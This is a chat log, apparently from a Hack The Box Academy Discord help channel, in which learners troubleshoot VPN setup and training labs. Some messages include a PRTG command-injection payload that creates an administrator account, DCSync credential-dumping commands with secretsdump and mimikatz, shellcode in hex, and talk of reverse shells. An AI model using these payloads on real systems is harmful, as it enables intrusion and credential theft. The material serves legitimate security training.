Support for Different Key Types: The .pem format supports various cryptographic algorithms, including RSA, DSA, and ECDSA. This means you can use it for different types of keys, depending on your security requirements and the systems you are working with.
When using SSH with a .pem file, you typically specify the private key file with the -i option in your SSH command, like so:
ssh -i /path/to/key.pem user@hostname
This tells SSH to use the provided private key for authentication instead of looking for the default key in the ~/.ssh directory.
Free 600$
holy wall of text

good night HTB
thank you
good night
No problem ... Here to learn
Scam
you need to guess the correct address
Gotta crack the hash for the address
May the odds ever be in your favor

Download the .ovpn configuration file on your Kali VM (in the home directory). Then open a terminal and type "sudo openvpn academy.ovpn" or however your .ovpn file is named ...
can you not copy paste chatgpt output pls thanks
I got hunter2
Thanks! almost there now.
Ok ... But then I will just give a short and not exhaustive answer next time ...
Yeah, and?
All I see is *******
Ok no problem
chatgpt output is useless because if someone wanted a chatgpt response they can just use it themselves. Youre providing no additional insight to the matter.
I can't believe discord auto hides passwords
I will type next time
can someone help on module 49. Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer. I have tried running Get-Process | select-object Processname, id but am not sure what non-standard update service to look out for. I am not familiar with all of them
What is module 49 ?
windows fundamentals
Uh, I still have to do that
xD
you can lookout for non microsoft services
when in doubt start googling
yes
is telling me to enter this instead: openvpn /path/to/NameHere.ovpn
I also tried: sudo openvpn /path/to/NameHere.ovpn
and: sudo openvpn NameHere.ovpn
But it wont work
@fringe crystal
did you write out the path or did you literally write the words /path/to/NameHere.ovpn
Are you entering that verbatim? Or is NameHere replaced with the name of the ovpn file?
and for that matter did you specify the right filename
No. Where it says NameHere I added what is telling me to add lol.
I guess what I am doing wrong is the path/to part then.
In my previous answer, I told you to download the .ovpn file in the home directory. But it should be into home/kali
guess its FoxitReaderUpdateService even though Foxit reader is a pdf editor
you just gotta supply the path of wherever you put the file
once it is into home/kali, then open the terminal and type sudo openvpn academy.ovpn
Ah I missed that part.
when they want .exe bruhh
i usually leave them in downloads and just do sudo openvpn ~/Downloads/madf0x.ovpn
it is easier if you put into home/kali because by default the terminal opens up in home/kali
me to
the question asked for Submit the full name of the service executable the executable is responsible for the service
Realistically if thats easier you should probably be doing linux fundamentals first instead
and .exe is part of that
there's something that I am missing ?
.exe means it's a windows executable
does mac use .exe?
no
.exe refers to the PE executable file type. Its Microsoft windows exclusive
not counting emulation shenanigans or polyfiles
acktually if you have wine installed you can run exe on mac
^ addressed
damnit too slow
anyone else have a stuck taskbar? on windows at times even with autohide enabled
@thorn urchin I am so sorry, but nothing works. I tried these:
sudo openvpn ~/Downloads/name.ovpn
and: sudo openvpn kali/Downloads/madf0x.ovpn
nothing works
first thing, you need to know what your ovpn file's name is, you can't just copy exactly what the others have used, where did you download the .ovpn file to?
Downloads
okay, now run ls ~/Downloads, what's the name of the .ovpn file?
share screenshot of your terminal
So, do I have to enter that whole name like it shows on the file?
well there you go, use that name in your sudo openvpn command
Ok. I was doing what the "Pending Connection.." message was saying. But, let me try it this way
That is the way its telling you
you just have to supply the full filename, its not psychic and doesnt know what file youre referring to until you tell it
Alright! Thanks!
but this is very different than what you guys told me though
I dont understand why you think its very different
you gotta supply the correct file name. That image is just using placeholders
Alright! I understand now. I'll keep that in mind going forward. Thank you again.
I used madf0x.ovpn because thats what mine is named lol
you might want to start with the linux fundamentals module
absolutely this
Will do.
I'm trying to log into samba share on last section of Enumeration with Nmap module. I'm past the Nmap part and need help with figuring out the password
to the samba share
so I can log into it
┌─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ smbclient //10.129.2.47/ -U us-academy-1
I tried adding in -L
and sudo
and its not working
You need to specify a share when connecting
how do I figure out the share?
When you do -L it lists the shares
I did that but it won't let me see the shares
Also the user won't be us-academy-1
┌─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ sudo smbclient -L //10.129.2.47/
do_connect: Connection to 10.129.2.47 failed (Error NT_STATUS_IO_TIMEOUT)
ok hold on
┌─[us-academy-1]─[10.10.14.144]─[htb-ac-605555@htb-5rribmwn0c]─[~]
└──╼ [★]$ sudo smbclient //10.129.2.47/ -L
Password for [WORKGROUP\root]:
The section tells you some things to try
You
ok hold on
There's another flag to basically skip asking for a password
oh wow
Also this section doesn't need smb login at all
The flag is a banner you get when you connect to the port
So, rescan the target - your only hint is non-standard
-N - don't ask for password.
Anyone know why or how to remedy this issue for the footprints lab - medium?
re-read the section about how NFS works
hi, im working on the live engagement for Shells & Payloads and every time i RDP into the foothold machine it times out and stops responding to pings
it was working completely fine yesterday, but now whenever i RDP in with the target IP it lets me into the machine, then a few seconds later it freezes up and the connection times out
└─$ xfreerdp /v:10.129.247.64 /u:htb-student /p:HTB_@cademy_stdnt!
[22:38:13:381] [16214:16215] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:38:13:381] [16214:16215] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:38:13:396] [16214:16215] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:38:13:397] [16214:16215] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:38:40:031] [16214:16215] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[22:38:40:031] [16214:16215] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[22:38:40:031] [16214:16215] [INFO][com.freerdp.client.common] - Network disconnect!
I've reset the target like... 5 times and it's the same result every time, I even got myself a fresh VPN file
ok i swapped my VPN file from UDP to TCP and it seems to be working now, please disregard
hello, Could anyone know this question format?
Hello, I'm stuck on skills assessment question 1 of 'Intro to Assembly Language'. I've worked through and I think I have the correct decoded shellcode, but it doesn't work. When I run the shellcode, it just returns a weird red dollar sign and exits when I try to type anything. This is the code I added to the nasm code to iterate and xor the shellcode:
mov rcx, 14
lea rdx, [rsp]
loop1:
xor [rdx], rbx
add rdx, 8
loop loop1
Here is the shellcode I'm getting:
48bbe6714831c05044215348167e66af7c7ab51bbba72346bf264d344c5348bb5348bb9a4bb67743e771125310633620214d14d248bbd244c980c10444214831311f48834889e7484831c0b0c708e2f740b70148014831ffe64831d231f648894831c048b21e0f0531ff0f0583c03c48
I don't understand what I'm doing wrong, can someone help me? Thank you!
[Ctrl] + [v] as an example
lol that question was phrased incredibly confusing, I've been using tmux for a number of years and it still took me a while to get it
Wait I think I copy and pasted the wrong shellcode, here is the shellcode i'm getting:
4831c05044215348167e66af7c7ab51bbba72346bf264d344c5348bb5348bb9a4bb67743e771125310633620214d14d248bbd244c980c10444214831311f48834889e7484831c0b0c708e2f740b70148014831ffe64831d231f648894831c048b21e0f0531ff0f05
I get the same result (weird red dollar sign) though
hi does anyone recommend a dns brute force domain list?
I'm using the DNS brute script or DNS Zone Transfer
Can you please help me with this? I found 2 rights in bloodhound as well but cant clear the question.
Probably one of the SecList ones
I don't remember how exactly I did it but it's better for you to run the modified shellcode in gdb and step through it so that you know what went wrong
and you can do the whole thing in cyberchef btw, there are a few steps but basically reverse the bits and xor it
The names are different on Bloodhound. You'd need to do some external research for the exact name academy expects or sometimes by resolving the name in PowerView.
ok thanks. I will try that soon good idea. I ought to go into nmap and try that one out
has anyone gotten the options error cmd line 1 when opening openvpn? The file isn't corrupt, I updated the openvpn reinstalled the parrot os. Not sure what else to try
Why are you doing it with Nmap scripting
Running with sudo?
Yes
What's the full error?
Give me a sec I'll show the terminal
You won't be able to paste a screenshot until you verify your main account following #welcome
Options error: In [cmd-line] :1: error opening configuration file lab.ovpn
Are you using absolute or relative path
If you're in the same directory you don't need to specify path
And the website uses /path/to/ as a placeholder
Yea once I open download dir. I sudo openvpn lab.ovpn
Worked in past now I get the error
That error usually means that it doesn't exist
please keep the channel on topic
Remember you can always refer to the help center - https://help.hackthebox.com/
This is off topic?
Fixing error messages related to the VPN is unrelated to the channel's intent
Thanks, I found the name :w
On the Attacking Common Services - Medium, do we have to get ftp access on port 2121 via brute force / anonymous access?
Just afraid I'm wasting time so would be nice to know if it's the wrong way lol (say nothing more than that of course! no spoiler!)
Iirc it gives you creds could be wrong though
I see thanks mate. anonymous login failed for me so will wait for the brute force to finish I guess, thanks!
You do have a username if you look closely
kk more than enough thanks mate
Also their password is weak if you wanna try a smaller list first
Sounds good, I'm afraid from their brute-force so the real password won't be in the list lol
All g
Stuck on AD Enumeration & Attacks - Skills Assessment Part I
Question:
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
I have creds of svc_sXX and tpXXXX. Done rdp to svc_sXX and explored but didn't found a way to get to DC01
Can anybody help?
Just on the verge of completion of the module
hey guy, I'm stuck on last 2 Q in AD second assessment too long,
don't know what I missed ...
need a little nudge please
@short hare @umbral fulcrum check what rights the user has, you don't even need to check bloodhound, the question clearly tells you that, go back to the previous sections to find out what you can do with those rights
Thing is that I can spawn a powershell of tpXXXX through creds of svc_sXX but the powershell is too much unresponsive
And also running tools from tpXXX gives access denied
And
Opening powershell through creds of tpXXX also gives access denied to the tools that i uploaded
Stuck in the middle
Hello! Could anyone help me with the Attacking Common Web services module? At PRTG right now and no matter what, I cannot get a RCE by notification abuse. Tried different payloads, no result so far.
check what rights the user has and what you can do with it
for the 5th day, can anyone please help me, i am at Broken Authentication username injection, tried to add the userid field but didnt work because of the oldpass doesnt match, tried to fuzz it, tried remove it, tried to change to GET method and changing the submit, but no luck so far
which is best tier 3 module? i can get only one with student sub so i want it to be worth it
common web services? is there a module like that
you just need to inject one parameter
when you reset your password
Sorry, officially it is: Attacking Common Applications
Tried the payload as shown in the module, and the original CVE blog. Tried | instead of ;. Tried creating the user and adding him to the administrators group, tried to just create a user (single command). Tried pinging back, while tcpdumping icmp.
Tried || test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add ||, tried username and pass without any special chars (in case they break sth.). I wanted to try ping and the reverse shell would be the next step.
try the reverse shell
That's the thing, I was not able to catch ping back, so I didn't move on to reverse shell. Will try harder.
anyone
That's a very subjective answer my guy
what is your opinion then
I haven't done any so couldn't tell you, but I'd pick one that's related to something that interests you
@candid lily Tried 3 different PS reverse shells, no success.
Nope. That's why I suspect no RCE is happening.
maybe the problem is where you are injecting, try to get icmp work, have a look at the CVE before it
I did. And used the same payload.
try using base64 ps revshells
are you sure thats your right ip
did you activate the notification or not?
you have to click the bell icon
special chars are encoded when you send anything through a website
through PRTG authenticated RCE you should be able to get a reverse shell or a ICMP trace (if enabled and allowed by both firewalls)
payload: abc.txt | <command here without special characters>
probably the dots are messing your command you can always use decimal notation for the ip
ping 168431491 = ping 10.10.15.131
tell me if need further assistance @patent whale
Tried the searchsploit, got the script, grabbed the cookie, the script executed successfully, user not created...
Also, tried to get the ping using | and trying decimal IP notation. No callback.
Reverted the machine, no success.
less 1337, but you can always use metasploit
in case you didn't yet...
Yep, that's what I planned as the next step. MSF and Wireshark to understand what's going on.
Metasploit worked like a charm. Now to analyze what has been happening.
i tried, injected the ||userid ||parameter but didnt work
Hi All, I am new to HTB academy. Can someone guide me. How can I know what is the right answer for a question in a module?
that is correct it should work
you read the module contents
For example, "what is the name of the first section of the module?" My answer is "Interactive Section". But I am being told it is wrong.
did you activate the notification by clicking bell button?
Is there way to check for answers or ask for help
you could find answers but you shouldnt
you should come up with the answer yourself by reading the content and doing some critical thinking
you could also ask for hints in this channel
Thank you
So can someone please provide a hint to very first question? What is the name of the first section of the module?
My answer is not working
it probably means that your old password is wrong
reset the machine and try again
that is incorrect indeed
omg i thought that it wants the old pass for htbadmin, wow
thank you so much
what is the first section? hint : first thing on your rightside of the screen (table of contents)
Yep
i just retried it a while ago and i got the ping
OK, Metasploit works, it uses ; and a command (base64 encoded meterpreter reverse shell in powershell). I did the same thing, just with plain tcp reverse shell. Not sure what I did wrong though.
hello is someone having issues with Proxy Error in Attacking enterprise networks? I am trying to enumerate and login into ||blog.inlanefreight.local and ir.inlanefreight.local|| but i keep getting this error and it's frustrating because i'm not sure if i am doing anything wrong or it's the service having problems
when getting this error, and assuming you have the right creds, just get back one page and see that you're actually logged in. You can notice the top bar as well
The thing is also enumerating is difficult because of that, i'm sure a set of creds is right because i was one time able to go further the login page but eventually it got stuck again with that damn error
For example || drupalscan || kept getting me 500 internal error when i ran the tool, i got results but i hardly believe they are reliable ones
Thanks I got it now
I am stuck on the "Password Attacks" Module on the section "Credential Hunting in Linux". Can someone give me a hint on how to get a foothold in the machine ?
do u know how to convert Certipy to a single .exe file? pyinstaller doesn't work with this
In certain env, python is not available and it's good to have a backup
Hi, I'm having trouble with the Nmap Scripting Engine question under the Network Enumeration with nmap
I can find what I think is the vulnerability, but I am unable to get the flag. I use the line:
sudo nmap [target ip] -p 80 -sV --script vuln
to see
| http-enum: |_ /robots.txt: Robots file
but it doesn't give the flag that the question is asking for
Browse to robots.txt or make a curl request
why are you trying to convert certipy, when certiFy is the windows equivalent of the tool
and what does this have to do with the modules
How would I do either of those options?
just use the browser
you are probably failing somewhere
but without showing proofs is kind of difficult to debug
i tried and ping works with both notations
This may be a really silly question but how would I do that? I'm not sure how I would use a browser to see the content of the file
By just browsing to IP/robots.txt
What do you mean by browsing? I'm not sure what that means in this context. There was no explanation of it in this section.
Just like you would visit any other website
How do you go to Google? Sure, not by the IP, but it's the exact same thing
oh, i didnt realize that was a capability! I see it now. Thank you
ur local ip address e.g. 192.168.0.1
192.168.0.1/robots.txt
Hi All, Stuck at Active Directory DCSync, second Q, What is this user's cleartext password? I try secretsdump from my kali using
impacket-secretsdump -outputfile inlanefreight_hashes -just-dc-user syncron INLANEFREIGHT.LOCAL/adunn@172.16.5.5 get an error connection refused.
tried mimikatz after runas.exe :
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\syncron but still can't see anything. I feel like I am doing something very wrong, need some tips here thank you.
just solved it using the same commands after restarting the target machine.
Evening guys,
Module: Shells & Payloads -> The Live Engagement
RDP machine is super slow or it's just me?
guys anyone know ? how to locate phone location using IMEI number??
also IMEI is just a serial number, you cannot get location from it. Only carrier lock status.
so it's not possible to locate the phone by using IMEI?
Pretty soon THM won't have anything unique
also guys it gives you special rewards
I want this badge
idk
There is no badge I am more curious about what are the prizes for these streaks
I guess it will be aligned with new pathway
me too
I think there will be a Badge
idk
it says rewards
I never liked the daily/weekly streak stuff, it just turns it into a chore where you have to leave things unsolved to have a source of points, or have to reset which is not even possible on academy
But what are weekly goals
It says it there, 30 points
i guess 30 right answers
that makes you very hard working and goal oriented to complete modules
Not sure without testing it out, maybe different answers give more based on cube rewards too
30 answers? HTB doesn't have that many modules left for me lol
It just makes you rush through the material
Then you should take a break and see the outside world
that is how you look at it but I do not think HTB is that easy to rush through
I have to train for CDSA and then for the new Web Cert. And to be honest, I have to learn programming languages first....
That's my point, so if it really is 30 answers, rushing is what you'll be doing
I think it's not, but someone can confirm after they've done it
I imagine rewards could be cubes, so that might be worth it, but ultimately, not a big fan
No idea yet it what it means exactly
xD
C# , and Assembly, Python are already there
Golang and rust is not
what if you dont have 30 available points in tier 0-2 modules
Sucks to be you, what if you're Bunny and have completed most of Academy period
HAHAHA
they are being racists to ppl who dont have enough content in the academy to be done
I don't know whether assembly really plays a role for the web certificate. Or do you mean modules? I have done them all
I wonder if points means the cube you get back after you answer a question.
Gotta find this thing out.
Knowing Webassembly would be beneficial to the understanding of web but there's no need for the cert specifically imho
Or points are assigned based on cube rewards, like 2 cubes back, 10 points or whatever, gotta check it out
Ah, seems like you just gotta answer 3 questions a day.
Each question is 10 points?
Just got 10 points for a question from fundamentals category.
Yeah
Lol, so is the 30 points weekly or daily?
weekly xD
Oh weekly.
Lmao, okay
they made it easy
you guys broke the system before it even started
Per hour lol
for me since im working im finding really hard to have time for the academy
sad but im learning from real world
it is account token delete method if you can not keep up it will delete the account lol
so im happy overall
HTB wildfire edition
Damn, 10+ for marking a section as complete?
